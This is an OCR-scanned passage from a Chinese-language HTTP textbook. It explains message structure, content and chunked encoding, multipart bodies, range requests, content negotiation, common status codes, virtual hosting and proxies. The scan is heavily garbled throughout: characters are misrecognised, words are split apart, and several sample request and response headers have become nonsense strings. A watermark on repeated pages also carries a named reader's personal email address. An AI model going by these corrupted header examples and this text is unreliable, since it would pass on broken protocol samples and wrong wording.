Content-Type: text/plain; charset=UTF-8 


(3) 请 求 报 文 ( 自动 发 送 保存 着 的 Cookie 信息 ) 


GET /image/ HTTP/1.1 
HOS nace 
Cookie: sid=1342077140226724 

















有 关 请 求 报 文 和 响应 报 文 内 Cookie 对 应 的 首部 字段 ， 请 参考 之 后 
的 章 厄 。 


040 
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第 3 章 
HTTP 报 文 内 的 HTTP 信息 
HTTP 通 信 过 程 包 括 从 客户 端 发 往 服务 器 端的 请 求 及 从 服务 器 端 


返回 客户 端 的 响应 。 本 章 就 让 我 们 来 了 解 一 下 请 求 和 响应 是 怎样 
运作 的 。 
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3.1 HTTP 报 文 


用 于 HTTP 协议 交互 的 信息 被 称 为 HTTP 报 文 。 请 求 端 (客户 端 ) 的 
HTTP 报 文 叫 做 请 求 报 文 ， 啊 应 端 〈 服 务 需 问 ) 的 叫做 啊 应 报 文 。HTTP 
报 文 本 吴 是 由 多 行 〈 用 CR+LF 作 换 行 符 ) 数据 构成 的 字符 串 文本 。 

HTTP 报 文 大 致 可 分 为 报 文 首 部 和 报 文 主体 两 块 。 两 者 由 最 初出 现 
的 空 行 ( CR+LF ) 来 划分 。 通 常 ， 并 不 一 定 要 有 报 文 主体 。 

[ 报 文 首部 】 
报 文 首 部 服务 器 端 或 客户 端 需 处 理 的 请 求 或 响应 的 内 容 及 属 ' 


[CR+LF] 
CR( Carriage Return， 回 车 符 : 16 进 制 0x0d ) 和 
LF( Line Feed, 换行 符 : 16 进 制 0x0a ) 


【 报 文 主体 】 
应 被 发 送 的 数据 


042 图 : HTTP 报 文 的 结构 





6 





3.2 ”请 求 报 文 及 响应 报 文 的 结构 
我 们 来 看 一 下 请 求 报 文 和 响应 报 文 的 结构 。 


ee 
请 来 行 
报 文 首 音 i 


通用 首部 字段 
实体 首部 字段 
其 他 


全 状态 行 
a 响应 首部 字段 


通用 首部 字段 
实体 首部 字段 
其 他 


























图 : 请 求 报 文 ( 上 ) 和 响应 报 文 ( 下 ) 的 结构 
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GET / HTTP/1.1 请 求 行 


SHE 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 
Aeeee :eee ea None ml ea nme 0 Om/ ONe 
Accept-Language: ja,en-us;dq=0.7,en;dq=0.3 

Accept-Encoding: gzip, deflate 

四 Ne 

Connection: keep-alive 

Pragma: no-cache 








Cache-Control: no-cache 各 种 首部 字段 
HTTP/1.1 200 OK 状态 行 





Dene Es 2012 0 有 229 六 全 

Se eaene 

malse Moe Ee Ee 0 0 0 0 ONeME 

EG: ASlael Mee Ade 

ee Renees :mes 

Content-Length: 362 

Connection: close 

Content-Type: text/html 各 种 首部 字段 





043 





图 : 请 求 报 文 ( 上 ) 和 响应 报 文 ( 下 ) 的 实例 





请 求 报 文 和 响应 报 文 的 首部 内 容 由 以 下 数据 组 成 。 现 在 出 现 的 各 种 
首部 字段 及 状态 码 稍 后 会 进行 阐述 。 
请 求 行 
包含 用 于 请 求 的 方法 ， 请 求 URI 和 HTTP 版 本 。 
状态 行 
包含 表明 响应 结果 的 状态 码 ， 原 因 短语 和 HTTP 版本。 
首部 字段 
包含 表示 请 求 和 响应 的 各 种 条 件 和 属性 的 各 类 首部 。 
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EARL 





一 般 有 4 种 首部 ， 分 别 是 : 通用 首部 、 请 求 首 部 、 啊 应 首部 和 实体 
站 和 ps 

其 他 
可 能 包含 HTTP 的 RFC 里 未 定义 的 首部 ( Cookie 等 )。 


3.3 ”编码 提升 传输 速率 


HTTP 在 传输 数据 时 可 以 按照 数据 原貌 直接 传输 ， 但 也 可 以 在 传输 
过 程 中 通过 编码 提升 传输 速率 。 通 过 在 传输 时 编码 ， 能 有 效 地 人 处理 大 量 
的 访问 请 求 。 但 是 ， 编 码 的 操作 需要 计算 机 来 完成 ， 因 此 会 消耗 更 多 的 
CPU 等 资源 。 


3.3.1 报 文 主体 和 实体 主体 的 差异 


> e@ 报 文 ( message ) 
是 HTTP 通信 中 的 基本 单位 ， 由 8 位 组 字 节 流 (octet sequence， 
其 中 octet 为 8 个 比特 ) 组 成 ,通过 HTTP 通信 传输 。 
e 实体 ( entity ) 
作为 请 求 或 啊 应 的 有 效 载 傈 数据 ( 补充 项 ) 被 传输 ， 其 内 容 由 实 
体 首 部 和 实体 主体 组 成 。 

















HTTP 报 文 的 主体 用 于 传输 请 求 或 啊 应 的 实体 主体 。 

通常 ， 报 文 主体 等 于 实体 主体 。 只 有 当 传输 中 进行 编码 操作 时 ， 实 
体 主体 的 内 容 发 生变 化 ， 才 导致 它 和 报 文 主体 产生 差异 。 

报 文 和 实体 这 两 个 术语 在 之 后 会 经 常 出 现 ， 请 事先 理解 两 者 的 差异 。 


3.3.2 ”压缩 传输 的 内 容 编码 
向 待 发 送 邮件 内 增加 附件 时 ， 为 了 使 邮件 容量 变 小 ， 我 们 会 先 用 
ZIP 压缩 文件 之 后 再 添加 附件 发 送 。HTTP 协议 中 有 一 种 被 称 为 内 容 编 
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码 的 功能 也 能 进行 类 似 的 操作 。 
内 容 编 码 指明 应 用 在 实体 内 容 上 的 编码 格式 ， 并 保持 实体 信息 原样 
压缩 。 内 容 编 码 后 的 实体 由 客户 站 接收 并 负责 解码 。 








(把 实体 压缩 变 小 后 发 送 ] 








am 
iy 


图 : 内 容 编码 


沼 用 的 内 容 编 码 有 以 下 几 种 。 


® gzip ( GNU zip ) 

e compress ( UNIX 系统 的 标准 压缩 ) 
® deflate ( zlib ) 

e identity ( 不 进行 编码 ) 


3.3.3 分割 发 送 的 分 块 传输 编码 

在 HITP 通信 过 程 中 ， 请 求 的 编码 实体 资源 尚未 全 部 传输 完成 之 
前 ， 浏 览 融 无 法 显示 请 求 页 面 。 在 传输 大 容量 数据 时 ， 通 过 把 数据 分 割 
成 多 块 ， 能 够 让 浏览 硕 逐 步 显 示 页 面 。 

这 种 把 实体 主体 分 块 的 功能 称 为 分 块 传输 编码 ( Chunked Transfer 
Coding )。 
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.。 分 割 物 称 为 
人 块 ( chunk ) 


ED 


先 将 实体 主体 分 割 变 小 
后 再 发 达 











: 分 块 传输 编码 





分 块 传输 编码 会 将 实体 主体 分 成 多 个 部 分 ( 块 )。 每 一 块 都 会 用 
十 六 进 制 来 标记 块 的 大 小 ， 而 实体 主体 的 最 后 一 块 会 使 用 “0(CR+LF)” 
来 标记 。 

使 用 分 块 传输 编码 的 实体 主体 会 由 接收 的 客户 端 负责 解码 ， 恢 复 到 
编码 前 的 实体 主体 。 

HTTP/1.1 中 存在 一 种 称 为 传输 编码 ( Transfer Coding ) 的 机 制 ， 它 
可 以 在 通信 时 按 某 种 编码 方式 传输 ， 但 只 定义 作用 于 分 块 传输 编码 中 。 








3.4 发 送 多 种 数据 的 多 部 分 对 象 集合 





MIME 多 部 分 对 象 集合 


发 送 邮 件 时 ， 我 们 可 以 在 邮件 里 写 入 文字 并 添加 多 份 附件 。 这 是 因 
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为 及 用 了 了 MIME ( Multipurpose Internet Mail Extensions， 多 用 途 因特网 
邮件 扩展 ) 机 制 ， 它 允许 邮件 处 理 文本 、 图 片 、 视 频 等 多 个 不 同类 型 的 
数据 。 人 例如， 图 片 等 二 进 制 数据 以 ASCII 码 字 符 串 编码 的 方式 指明 ， 就 
是 利用 MIME 来 描述 标记 数据 类 型 。 而 在 MIME 扩展 中 会 使 用 一 种 称 
为 多 部 分 对 象 集合 ( Multipart ) 的 方法 ， 来 容纳 多 份 不 同类 型 的 数据 。 

相应 地 ，HTTP 协议 中 也 采纳 了 多 部 分 对 和 象 集合 ， 发 送 的 一 份 报 文 
主体 内 可 含有 多 类 型 实体 。 通 常 是 在 图 片 或 文本 文件 等 上 传 时 使 用 。 

多 部 分 对 象 集合 包含 的 对 象 如 下 。 

® multipart/form-data 


在 Web 表单 文件 上 传 时 使 用 。 


emultipart/byteranges 
状态 公 206 (Partial Content， 部 分 内 容 ) 响应 报 文 包含 了 多 个 范 
围 的 内 容 时 使 用 。 


® multipart/form-data 











Content-Type: multipart/form-data; boundary=AaB03x 


--AaB03x 


Content-Disposition: form-data; name="field1'" 


Joe Blow 

--AaB03x 

Content-Disposition: form-data; name="pics"; filename="filel .txt" 
Content-Type: text/plain 


，(F1I]eT ExtE 的 数 忆 ) 
--AaB03x-- 


© multipart/byteranges 


EVD/ ,1 206 Barctial Gonctenc 
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Da el, 13 Jul 2012 02:45:26 YT 
alse Mochi: 0 0 :00900 EME 
Content-Type: multipart/byteranges; boundary=THIS STRING SEPARATES 


--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content-Range: bytes 500-999/8000 


 ( 艺 围 指定 的 数据 ) .…- 
--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content-Range: bytes 7000-7999/8000 


(范围 指定 的 数据 ) :…- 
--THIS STRING SEPARATES-- 


在 HTTP 报 文 中 使 用 多 部 分 对 象 集 合 时 ， 需 要 在 首部 字段 里 加 上 
Content-type。 有 关 这 个 首部 人 字段， 我 们 稍 后 讲解 。 

使 用 boundary 字符 串 来 划分 多 部 分 对 象 集合 指明 的 各 类 实体 。 在 
boundary 字符 串 指 定 的 各 个 实体 的 起 始 行 之 前 搬入 “--” 标 记 (例如 : 
--AaB03x、--THIS STRING SEPARATES )， 而 在 多 部 分 对 象 集合 对 应 
的 字符 串 的 最 后 插入 “--” 标 记 (例如 : --AaB03x--、--THIS_STRING 
SEPARATES-- ) 作为 结 

多 部 分 对 象 集合 的 每 个 部 分 类 型 中 ， 都 可 以 含有 首部 字段 。 另 外 ， 
可 以 在 某 个 部 分 中 纶 套 使 用 多 部 分 对 象 集合 。 有 关 多 部 分 对 象 集合 更 详 
细 的 解释 ， 请 参考 RFC2046。 
































3.5 ”获取 部 分 内 容 的 范围 请 求 


以 前 ， 用 户 不 能 使 用 现在 这 种 高 速 的 带宽 访问 互联 网 ， 当 时 ， 下 载 
一 个 太 才 稍 大 的 图 所 或 文件 就 已 经 很 吃力 了 。 如 打下 载 过 程 中 遇 到 网 络 
中 断 的 情况 ， 那 就 必须 重头 开始 。 为 了 解决 上 述 问题 ， 需 要 一 种 可 恢复 
的 机 制 。 所 谓 恢 复 是 指 能 从 之 前 下 载 中 断 处 恢复 下 载 。 
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要 实现 该 功能 需要 指定 下 载 的 实体 范围 。 像 这 样 ， 指 定 范围 发 送 的 
请 求 叫做 范围 请 求 (Range Request )。 
对 一 份 10 000 字 市 大 小 的 资源 ， 如 采 使 用 范围 请 求 ， 可 以 只 请 求 


5001~10 000 字 节 内 的 资源 。 
J he 
auido 昌 a 











SETI/CID Jo HTTP/L: 1] 
Host: www.usagidesign.jp 
REG IOXEES ES5001=10000 





HE 0 ane omene 049 


Dalse En 0 EME 


Content-Range: bytes 5001-10000/10000 
Content-Length: 5000 
Content-Type: image/jpeg 


执行 范围 请 求 时 ， 会 用 到 首部 字段 Range 来 指定 资源 的 byte 范围 。 
byte 范围 的 指定 形式 如 下 。 
e 5001~10 000 字 节 


RamoEaoaes SO 


e@ 从 5001 字 节 之 后 全 部 的 


Range: bytes=5001- 
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国 四 四 
e 从 一 开始 到 3000 字 节 和 5000~7000 字 节 的 多 重 范围 


Rameer mv eese O00 wo 


针对 范围 请 求 ， 啊 应 会 返回 状态 码 为 206 Partial Content 的 啊 应 报 
文 E 而 外 。 ee 啊 应 会 在 首部 字段 Content-Type 
标明 multipart/byteranges 后 返回 啊 应 报 文 。 

如 朱 服 务 沉 病 无 法 啊 应 范围 请 求 ， 则 会 返回 状态 码 200 OK 和 完整 








的 实体 内 容 。 
3.6 ”内 容 协商 返 适 的 内 容 





同一 个 Web 网 站 有 可 能 存在 看 多 份 相同 内 容 的 页 面 。 比 如 瑞 语 版 
050 ”和 中 文 版 的 Web 页 面 ， 它 们 内 容 上 虽 相 同 ,但 使 用 的 语言 却 不 同 。 
当 浏 览 硕 的 默认 语言 为 英语 或 中 文 ， 访 问 相 同 URI 的 Web 页 面 时 ， 
则 会 显示 对 应 的 英语 版 或 中 文 版 的 Web 页 面 。 这 样 的 机 制 称 为 内 容 协 
了 阐 ( Content Negotiation )。 





浏览 器 的 默认 语言 为 英语 
| 


浏览 器 的 默认 语言 为 中 文 


Google 
3 


Feed 想 本 手电 才刚 


(Google 


Pg Bear Pn Foeslleag Leky 


显示 严 语 页 面 


显示 中 文 页 面 


图 : 访问 http://www.google.com/ 


图 灵 社区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 3 章 HTTP 报 文 内 的 HTTP 信 息 


内 容 协商 机 制 是 指 客户 端 和 服务 套 痪 就 啊 应 的 资源 内 容 进 行 交 涉 ， 
然后 提供 给 客户 端 最 为 适合 的 资源 。 内 容 协商 会 以 啊 应 资源 的 语言 、 字 
符 集 、 编 码 方式 等 作为 判断 的 基准 。 

包含 在 请 求 报 文中 的 某 些 首部 字段 (如 下 ) 就 是 判断 的 基准 。 这 些 
首部 字段 的 详细 说 明 请 参考 下 一 章 。 








@ Accept 

@ Accept-Charset 

® Accept-Encoding 
@ Accept-Language 


® Content-Language 

内 容 协 商 技 术 有 以 下 3 种 类 型 。 

服务 器 驱动 协商 ( Server-driven Negotiation ) 051 
由 服务 器 端 进行 内 容 协商 。 以 请 求 的 首部 字段 为 参考 ， 在 服务 需 端 

自动 处 理 。 但 对 用 户 来 说 ， 以 浏览 器 发 送 的 信息 作为 判定 的 依据 ， 

并 不 一 定 能 筛选 出 最 优 内 容 。 














客户 端 驱动 协商 ( Agent-driven Negotiation ) 

由 客户 端 进行 内 容 协商 的 方式 。 用 户 从 浏览 右 显 示 的 可 选项 列表 中 
手动 选择 。 还 可 以 利用 JavaScript 脚本 在 Web 页 面 上 目 动 进行 上 述 
选择 。 比 如 按 OS 的 类 型 或 浏览 硕 类 型 ， 上 自行 切换 成 PC 版 页 面 或 
手机 版 页 面 。 








透明 协商 ( Transparent Negotiation ) 
是 服务 一 驱动 和 客户 端 驱动 的 结合 体 ， 是 由 服务 带 端 和 客户 端 各 日 
进行 内 容 协 商 的 一 种 方法 。 





图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 












= 
= 


pe 
结果 的 HTTP 状态 码 


HTTP 状态 码 负责 表示 客户 端 HTTP 请求 的 返回 结果 、 标 记 服 务 器 
端的 处 理 是 否 正常 、 通 知 出 现 的 错误 等 工作 。 让 我 们 通过 本 章 的 学 
习 ， 好 好 了 解 一 下 状态 码 的 工作 机 制 。 





图 灵 社 区 会 员 Dylan.Y(yuanlongyoungQ@gmail.com) 专 享 尊重 版 权 


054 





4.1 状态 码 告知 从 服务 器 站 返回 的 请 求 结 

状态 码 的 职责 是 当 客 户 端 向 服务 器 端 发 送 请 求 时 ， 描 述 返 回 的 请 求 
结果 。 借 助 状 态 码 ， 用 户 可 以 知道 服务 器 端 是 正常 处 理 了 请 求 ， 还 是 出 
现 了 错误 。 











正常 :状态 码 2XX 







进展 顺利 ! 






其 处 理 结果 是 ? 







似 刍 不 行 啊 …… 


图 : 响应 的 状态 码 可 描述 请 求 的 处 理 结 果 


状态 人 码 如 200 OK， 以 3 位 数字 和 原因 短语 组 成 。 
数字 中 的 第 一 位 指定 了 啊 应 类 别 ， 后 两 位 无 分 类 。 啊 应 类 别 有 以 下 
5 种 。 


表 4-1: 状态 码 的 类 别 


并 | 原 知 语 | 
Informational ( 信息 性 状态 码 ) 接收 的 请 求 正在 处 理 
Success ( 成 功 状 态 码 ) 请 求 正常 处 理 完毕 


Redirection ( 重 定向 状态 码 ) 需要 进行 附加 操作 以 完成 请 求 
Client Error ( 客户 端 错误 状态 码 ) 服务 器 无 法 处 理 请 求 
Server Error ( 服务 器 错误 状态 码 ) 服务 器 处 理 请 求 出 错 
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慌 


只 要 遵守 状态 码 类 别 的 定义 ， 即 使 改变 RFC2616 中 定义 的 状态 人 码 ， 
或 服务 需 端 自行 创建 状态 码 都 没 问 题 。 

仅 记 录 在 RFC2616 上 的 HTTP 状态 码 就 达 40 种 ， 若 再 加 上 
WebDAV ( Web-based Distributed Authoring and Versioning， 基 于 万 维 网 
的 分 布 式 创作 和 版 本 控制 ) (RFC4918、5842 ) 和 附加 HITP 状态 码 
( RFC6585 ) 等 扩展 ， 数 量 就 达 60 余 种 。 别 看 种 类 过 多 ， 实 际 上 经 尝 使 
用 的 大 概 只 有 14 种 。 接 下 来 ， 我 们 就 介绍 一 下 这 些 具有 代表 性 的 14 个 
状态 码 。 








4.2 2XX 成 功 


2XX 的 啊 应 结 末 表明 请 求 被 正常 处 理 了 。 








4.2.1 200 OK 
055 


请 求 已 正常 处 理 
NE 


客户 端 若 请 求 正常 处 理 则 返回 200 OK 服务 器 


表示 从 客户 端 发 来 的 请 求 在 服务 曾 问 被 正 第 处 理 了 。 

在 啊 应 报 文 内 ， 随 状态 码 一 起 返回 的 信息 会 因 方法 的 不 同 而 发 生 改 
变 。 比 如 ， 使 用 GET 方法 时 ， 对 应 请 求 资 源 的 实体 会 作为 啊 应 返回 | 
而 使 用 HEAD 方法 时 ， 对 应 请 求 资 源 的 实体 首部 不 随 报 文 主体 作为 啊 
应 返回 〈《 即 在 啊 应 中 只 返回 首部 ， 不 会 返回 实体 的 主体 部 分 )。 
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4.2.2 204 No Content 







请 求 处 理 成 功 ! 
但 没有 资源 可 返回 





客户 疡 服务 器 
该 状态 码 代表 服务 器 接收 的 请 求 已 成 功 处 理 ， 但 在 返回 的 响应 报 文 
中 不 含 实体 的 主体 部 分 。 另 外 ， 也 不 允许 返回 任何 实体 的 主体 。 比 如 ， 
当 从 浏览 器 发 出 请 求 处 理 后 ， 返 回 204 响应 ， 那 么 浏览 器 显示 的 页 面 不 
发 生 更 新 。 
一 般 在 只 需要 从 客户 端 往 服务 器 发 送信 息 ， 而 对 客户 端 不 需要 发 送 
658 新 信息 内 容 的 情况 下 使 用 。 











4.2.3 206 Partial Content 






明白 / 是 对 资源 某 一 
部 分 曲 请 求 








该 状态 人 码 表示 客户 端 进行 了 汇 围 请 求 ， 而 服务 益 成 功 执行 了 这 部 分 
的 GET 请 求 。 响 应 报 文 中 包含 由 Content-Range 指定 范围 的 实体 内 容 。 





4.3 3XX 重 定向 
3XX 啊 应 结果 表明 浏览 硕 需 要 执行 某 些 特殊 的 处 理 以 正确 处 理 
请 求 。 
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4.3.1 301 Moved Permanently 






需要 进行 书签 


禄 : 原 的 URI 已 和 更新。 你 也 重 
引用 的 变更 


新 下 你 曲 书 恰 引 用 到? 


服务 强 

永久 性 重 定向 。 该 状态 码 表示 请 求 的 资源 已 被 分 配 了 新 的 URI， 以 

后 应 使 用 资源 现在 所 指 的 URI。 也 就 是 说 ， 如 采 已 经 把 资源 对 应 的 URI 

保存 为 书签 了 ， 这 时 应 该 按 Location 首部 宇 段 提示 的 URI 重新 保存 。 

像 下 方 给 出 的 请 求 URI， 当 指定 
“/”， 就 会 产生 301 状态 码 。 





资源 路 径 的 最 后 筷 记 添加 笠 杜 
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http://example.com/sample 


4.3.2 302 Found 







资源 的 URI 已 临时 定 信 到 
其 他 位 置 了 3 了。 姑且 算 你 已 
经 知道 这 个 情况 了。 





临时 性 重 定 向。 该 状态 人 码 表 示 请 求 的 资源 已 被 分 配 了 新 的 URI, 项 
望 用 户 ( 本 次 ) 能 使 用 新 的 URI 访问 。 
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和 301 Moved Permanently 状态 人 码 相 似 ， 但 302 状态 码 代表 的 资源 
不 是 被 永久 移动 ， 只 是 临时 性 质 的 。 换 句 话 说， 已 移动 的 资源 对 应 的 
URI 将 来 还 有 可 能 发 后 改变 。 比 如 ， 用 户 把 URI 保存 成 书签 ， 但 不 会 像 
301 状态 码 出 现时 那样 去 更 新 书签 ， 而 是 仍旧 保留 返回 302 状态 人 码 的 页 
面 对 应 的 URI。 





4.3.3 303 See Other 






资源 的 URI 已 和 更新， 你 是 否 
能 临时 控 新 的 URI 访问 ? 


客 尸 端 


该 状态 码 表示 由 于 请 求 对 应 的 资源 存在 着 另 一 个 URI， 应 使 用 GET 
方法 定向 获取 请 求 的 资源 。 

303 状态 码 和 302 Found 状态 码 有 着 相同 的 功能 ， 但 303 状态 码 明 
确 表示 客户 端 应 当 采 用 GET 方法 获取 资源 ， 这 点 与 302 状态 码 有 区 别 。 

比如 ， 当 使 用 POST 方法 访问 CGI 程序 ， 其 执行 后 的 处 理 结果 是 希 
望 客户 端 能 以 GET 方法 重 定 问 到 男 一 个 URI 上 去 时 ， 返 回 303 状态 码 。 
虽然 302 Found 状态 码 也 可 以 实现 相同 的 功能 ， 但 这 里 使 用 303 状态 码 
是 最 理想 的 。” 


CD 


有 务 器 




















(DD 本 书 采 用 的 是 HTTP/1.1, 而 许多 HTTP/1.1 版 以 前 的 浏览 器 不 能 正确 理解 303 
状态 码 。 虽 然 RFC 1945 和 RFC 2068 规 范 不 允许 客户 端 在 重 定向 时 改变 请 求 
的 方法 ， 但 是 很 多 现存 的 浏览 器 将 302 响 应 视 为 303 响 应 ， 并 且 使 用 GET 方 
式 访问 在 Location 中 规定 的 URI， 而 无 视 原 先 请 求 的 方法 。 所 以 作者 说 这 里 
使 用 303 是 最 理想 的 。 译 者 注 
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国 图 
中 | 国 图 
当 301、302、303 响应 状态 码 返 回 时 ， 几 乎 所 有 的 浏览 器 都 会 把 
POST 改 成 GET， 并 删除 请 求 报 文 内 的 主体 ， 之 后 请 求 会 自动 再 次 发 送 。 
301、302 标准 是 禁止 将 POST 方法 改变 成 GET 方法 的 ， 但 实际 使 用 
时 大 家 都 会 这 么 做 。 
国 加 加 
国 国 


4.3.4 304 Not Modified 





客户 端 缓存 服务 器 





该 状态 码 表示 客户 端 发 送 附 带 条 件 的 请 求 ” 时， 服务 器 端 允许 请 求 
访问 资源 ， 但 未 满足 条 件 的 情 部 。304 状态 码 返 回 时 ， 不 包含 任何 响应 
的 主体 部 分 。304 虽然 被 划分 在 3XX 类 别 中 ,但 是 和 重 定向 没有 关系 。 





4.3.5 307 Temporary Redirect 

临时 重 定向 。 该 状态 码 与 302 Found 有 着 相同 的 含义 。 尽 管 302 标 
准 禁止 POST 变换 成 GET， 但 实际 使 用 时 大 家 并 不 遵守 。 

307 会 遵照 浏览 器 标准 ， 不 会 从 POST 变 成 GET。 但 是 ， 对 于 处 理 
吧 应 时 的 行为 ， 每 种 浏览 杭 有 可 能 出 现 不 同 的 情况 。 














QD 附带 条 件 的 请 求 是 指 采 用 GET 方 法 的 请 求 报 文中 包含 IfEMatch,，If-Modified- 
Since，If-None-Match，If-Range，If-Unmodified-Since 中 任 一 首部 。 
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4.4 4XX 客户 端 错误 
4XX 的 响应 结果 表明 客户 端 是 发 生 错误 的 原因 所 在 。 


4.4.1 400 Bad Request 





客户 站 


该 状态 码 表示 请 求 报 文中 存在 语法 错误 。 当 错误 发 生 时 ， 需 修改 请 求 
的 内 容 后 再 次 发 送 请 求 。 另 外 ， 浏 览 需 会 像 200 OK 一 样 对 待 该 状态 码 。 














4.4.2 401 Unauthorized 








人 认证 失败 
( 请 求 中 已 包含 Authorizatio 





月 | Nn 
credentials ) 2 


Authorization Required 

This server could not verify that you are authorized to 
access the document requested. Either you supplied the 
wrong credentials (e.g., bad password), or your browser 
doesn't understand how to supply the credentials required. 
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该 状态 码 表 示 发 送 的 请 求 需 要 有 通过 HTTP Po ( BASIC 认证 、 
DIGEST 认证 ) 的 认证 信息 。 另 外 看 之 前 已 进行 过 !1 次 请 求 ， 则 表示 用 
返回 含有 401 的 啊 应 必须 包含 一 个 适用 于 被 请 求 资源 的 WWW- 
Authenticate 首部 用 以 质询 (challenge ) 用 户 信 息 。 当 浏览 需 初 次 接收 
到 401 啊 应 ， 会 弹出 认证 用 的 对 话 窗 口 。 





4.4.3 403 Forbidden 





不 亿 评 访问 那个 
资 原 吗 

















该 状态 码 表 明 对 请 求人 资源 的 访问 被 服务 郁 拒 绝 卫 。 服 务 珊 病 没 有 必 
要 给 出 拒绝 的 详细 理由 ,但 如 末 想 作 说 明 的 话 ， 可 以 在 实体 的 主体 部 分 
对 原因 进行 摘 述 ， 这 样 就 能 让 用 户 看 到 了 了。 

未 获得 文件 系统 的 访问 授权 ,访问 权限 出 现 某 些 问 题 ( 从 未 授权 的 
发 送 源 IP 地 址 试图 访问 ) 每 列举 的 情况 都 可 能 是 发 生 403 的 原因 。 








4.4.4 404 Not Found 






服务 器 上 没有 请 求 的 资源 






Not Found 


The requested URL /a was not found on this server. 
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上 








该 状态 人 码 表明 服务 保 上 无 法 找到 请 求 的 资源 。 除 此 之 外 ， 也 可 以 在 
服务 硕 问 拒绝 请 求 且 不 想 说 明理 由 时 使 用 。 











4.5 5XX 服务 器 错误 
5XX 的 响应 结果 表明 服务 器 本 身 发 生 错 误 。 





4.5.1 500 Internal Server Error 






狐 似 ， 内 部 资源 出 


ee 


客户 站 服务 器 


该 状态 码 表明 服务 胡 端 在 执行 请 求 时 发 生 了 错误 。 也 有 可 能 是 Web 
应 用 存在 的 bug 或 条 些 临 时 的 故障 。 
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4.5.2 503 Service Unavailable 


担 革 ， 现 在 我 正 忙 着 


客户 端 服务 器 





该 状态 码 表明 服务 内 和 暂时 处 于 超 负载 或 正在 进行 停机 维护 ， 现 在 无 
法 处 理 请 求 。 如 果 事 先 得 知 解除 以 上 状况 需要 的 时 间 ， 最 好 写 和 人 Retry- 
After 首部 字段 再 返回 给 客户 端 。 
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国 图 
辐 国 图 
状态 码 和 状况 的 不 一 致 
不 少 返 回 的 状态 码 响 应 都 是 错误 的 ， 但 是 用 户 可 能 察觉 不 到 这 点 。 比 
如 Web 应 用 程序 内 部 发 生 错 误 ， 状 态 码 依然 返回 200 OK， 这 种 情况 也 经 


前 遇 到 。 
加 图 国 
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- 

第 5 章 

与 HTTP 协作 的 Web 服务 器 


一 台 Web 服 务 器 可 搭建 多 个 独立 域名 的 Web 网 站 ,也 可 作为 通信 
路 径 上 的 中 转 服务 器 提升 传输 效率 。 
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5.1 用 单 台 虚拟 主机 实现 多 个 域名 


HTTP/1.1 规范 允许 一 台 HTTP 服务 名 搭建 多 个 Web 站 点 。 比 如 ， 
提供 Web 托管 服务 ( Web Hosting Service ) 的 供应 商 ， 可 以 用 一 台 服 务 
需 为 多 位 客户 服务 ， 也 可 以 以 每 位 客户 持 有 的 域名 运行 各 目 不 同 的 网 站 。 
这 是 因为 利用 了 虚拟 主机 (Virtual Host， 又 称 虚 拟 服务 带 ) 的 功能 。 

即使 物理 层面 只 有 一 台 服 务 器 ,但 只 要 使 用 虚拟 主机 的 功能 ， 则 可 
以 假想 已 具有 多 人 台 服务 需 。 
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物理 层面 的 服务 妖 





虚拟 主机 


www.hackr.jp 


虚拟 主机 


xss.hackr.jp 


客户 问 使 用 HTTP 协议 访问 服务 带 时 ， 会 经 常 采 用 类 似 www.hackr. 
jp 这 样 的 主机 名 和 域名 。 

在 互联 网 上 ， 域 名 通过 DNS 服务 映射 到 IP 地址 ( 域名 解析 ) 之 后 
访问 目标 网 站 。 可 见 ， 当 请 求 发 送 到 服务 硕 时 ， 已 经 是 以 卫 地 址 形式 
访问 了 。 

所 以 ， 如 有 果 一 台 服 务 套 内 托管 了 wwwtricorderjp 和 www.hackrjp 
这 两 个 域名 ， 当 收 到 请 求 时 就 需要 弄 清楚 究竟 要 访问 哪个 域名 。 
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服务 器 


若 www:tricorder.jp 和 www.hackr.jp 同时 部 署 在 同一 个 服务 
器 上 ( 相同 的 IP 地 址 ), 使 用 DNS 服务 解析 域名 后 ,两 者 的 访 
问 IP 地 址 会 相同 。 


本 


在 相同 的 卫 地 址 下 ， 由 于 虚拟 主机 可 以 寄存 多 个 不 同 主 机 名 和 域 
名 的 Web 网 站 ， 因 此 在 发 送 HTTP 请 求 时 ， 必 须 在 Host 首部 内 完整 指 
定 主 机 名 或 域名 的 URI。 








067 


5.2 ”通信 数据 转发 程序 : 代理 、 了 网关、 隧道 


HTTP 通信 时 ， 除 客户 端 和 服务 需 以 外 ， 还 有 一 些 用 于 通信 数据 转 
发 的 应 用 程序 ， 例 如 代理 、 网 关 和 隧道 。 它 们 可 以 配合 服务 器 工作 。 

这 些 应 用 程序 和 服务 需 可 以 将 请 求 转发 给 通信 线路 上 的 下 一 站 服务 
器 ， 并 且 能 接收 从 那 台 服务 器 发 送 的 响应 再 转发 给 客户 端 。 


代理 

代理 是 一 种 有 转发 功能 的 应 用 程序 ， 它 扮演 了 位 于 服务 天 和 客户 端 
“中 间 人 ”的 角色 ， 接 收 由 客户 端 发送 的 请 求 并 转发 给 服务 页 ， 同 
时 也 接收 服务 佛 返 回 的 啊 应 并 转发 给 客户 闯 。 





网 天 

网 天 是 转发 其 他 服务 表 通 信 数 据 的 服务 硼 ， 接 收 从 客户 端 发 送 来 的 
请 求 时 ， 它 就 像 目 己 拥有 资源 的 源 服务 从 一 样 对 请 求 进行 处 理 。 有 
时 客户 端 可 能 部 不 会 察觉 ， 目 己 的 通信 目标 钙 一 个 网 天 。 
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道 
隧道 是 在 相 隅 其 远 的 客户 端 和 服务 作 两 者 之 间 进 行 中 转 ， 并 你 持 双 
通 


通信 连接 的 应 用 程序 。 


\ \ 
| | 





Lo Lo 





代理 服务 器 的 基本 行为 就 是 接收 客户 端 发 送 的 请 求 后 转发 给 其 他 
068 服务器。 代理 不 改变 请 求 URI， 会 直接 发 送 给 前 方 持 有 资源 的 目标 服 
务 髓 。 
持 有 资源 实体 的 服务 需 被 称 为 源 服 务 器 。 从 源 服务 器 返回 的 响应 经 
过 代理 服务 需 后 再 传 给 客户 端 。 


Bm mm mn mm 00 RS  y 


a I 六 GE ll 
viaproxyin, Via: ProXy2 Broxvl, 


/ 












mm mm 呈 





fl RA 1 200 OK， {lhl lle L200 OK 
